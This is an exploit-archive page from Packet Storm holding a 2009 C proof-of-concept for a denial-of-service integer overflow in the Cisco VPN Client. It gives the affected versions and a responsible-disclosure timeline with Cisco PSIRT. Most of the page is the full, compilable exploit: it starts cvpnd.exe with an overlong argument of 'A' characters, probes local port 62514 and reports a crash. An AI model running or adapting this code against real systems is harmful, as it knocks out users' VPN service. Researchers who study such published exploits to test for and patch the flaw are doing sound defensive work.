what you don't know can hurt you

Cisco VPN Client 0day Integer Overflow

Cisco VPN Client 0day Integer Overflow
Posted Nov 20, 2009
Authored by Alex Hernandez

Cisco VPN Client 0day integer overflow denial of service proof of concept code.

tags | exploit, denial of service, overflow, proof of concept
systems | cisco
SHA-256 | 142bea9a4f77b4e9264718284df5e0a2a9694680c035f320894fc7e1f5fcd792

Cisco VPN Client 0day Integer Overflow

Change Mirror Download
/* 
* Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
*
* By Alex Hernandez aka alt3kx (c) November 2009
*
* This POC is only for test. If an application read a malformed chars
* file like this POC, the application will be crashed.
*
* We tested this code on:
*
* Windows Vista Bussines SP1 Spanish
* Windows Vista Home Premium SP1 English
* Windows 2000 Server English
* Windows XP Professional SP3
*
* Cisco VPN client version 5.0.03.0560
* Cisco VPN client Version 5.0.04.0300
* Cisco VPN client Version 5.0.05.0290
* Cisco VPN client Version 4.8.02.0010
*
* Compiled on VC++ win32
*
* Friends:
* sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
*
* TT & DSRT
* daSh, p4r4n01ds, darkslaker, beto, motis.
*
* Very special credits to:
*
* str0ke (milw0rm.com)
* rathaus (securiteam.com)
* FX (Phenoelit.de)
* dSR! (segfault.es)
* 0dd (0dd.com)
*
*
* PH-Neutral 0x7d9, We hope to see u there intruders
*
* ---------------
* Report Timeline
* ---------------
* 06/03/2009 The vulnerability was discovered.
* 07/03/2009 Exploit/PoC code was developed (private).
* 09/03/2009 Cisco PSIRT was notified about the issue.
* 11/03/2009 Vendor response asking for details of the testing environment.
* 12/03/2009 Test scenario explained and sent a PDF document with details.
* 16/03/2009 Developers/PSIRT confirmed the vulnerability.
* 19/03/2009 New test scenarios around new versions (CISCO VPN client).
* 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279.
* 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276.
* 15/04/2009 New Advisory release (private).
* 16/04/2009 New PSIRT feedback no ETA avaiable.
* 23/04/2009 The development team working the fix.
* 01/05/2009 The development team estimated one month to fix.
* 01/06/2009 New PSIRT feedback, no ETA available.
* 29/06/2009 The development team estimated one month to fix.
* 28/07/2009 The development team working on maitenance release.
* 28/07/2009 The development team estimated one month to fix.
* 02/09/2009 New vulnerabilities found on CISCO VPN client.
* 02/09/2009 The development team can not publish the new version 5.0.6.
* 02/09/2009 The development team working on maitenance release.
* 02/09/2009 The development team estimated one month to fix.
* 10/09/2009 The BETA program should be finished by the end of Oct
* and the client posted next month.
* 07/10/2009 The development team estimated one month to fix.
* 11/11/2009 New PSIRT feedback RNA avaiable.
* 19/11/2009 The vulnerability goes public and PSIRT is informed.
* 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
*
* CISCO Fix and Details:
*
* BugToolKit:
* http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
*
* Intellishield Alert:
* http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
*
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment ( lib, "ws2_32.lib" )

int CheckPortUDP( short int nPort )
{
struct sockaddr_in nSockServer;

WSADATA wsaData;

int lBusy = 0;
int nSocket;

/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

/* Check UDP Protocol */
nSocket = socket( AF_INET, SOCK_DGRAM, 0 );

lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );

/* Close Socket if Busy */
if( lBusy )
closesocket( nSocket );

/* Close Winsock */
WSACleanup();
}

/* Return */
return( lBusy );
}

int CheckPortTCP( short int nPort )
{
struct sockaddr_in nSockServer;

WSADATA wsaData;

int lBusy = 0;
int nSocket;

/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

/* Check TCP Protocol */
nSocket = socket( AF_INET, SOCK_STREAM, 0 );

lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
sizeof( nSockServer ) ) == 0 );

/* Close Socket if Busy */
if( lBusy )
closesocket( nSocket );

/* Close Winsock */
WSACleanup();
}

/* Return */
return( lBusy );
}

int main(void)
{

char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
//uncomment this line for Windows XP Spanish versions
//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
PROCESS_INFORMATION pif;
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);

BOOL bRet = CreateProcess(
szPath,
buffer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pif);

system("cls");
printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n");


/* Check for TCP Port */

if( CheckPortTCP(62514) )
printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
else
printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");

/* Check for UDP Port */

if( CheckPortUDP(62514) )
printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
else
printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");

if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
return 1;}

else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
printf("\n[+] Few seconds to crash the program...\n");
printf("[+] Exploit success...\n\n");
return 1;}

CloseHandle(pif.hProcess);
CloseHandle(pif.hThread);

}




Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close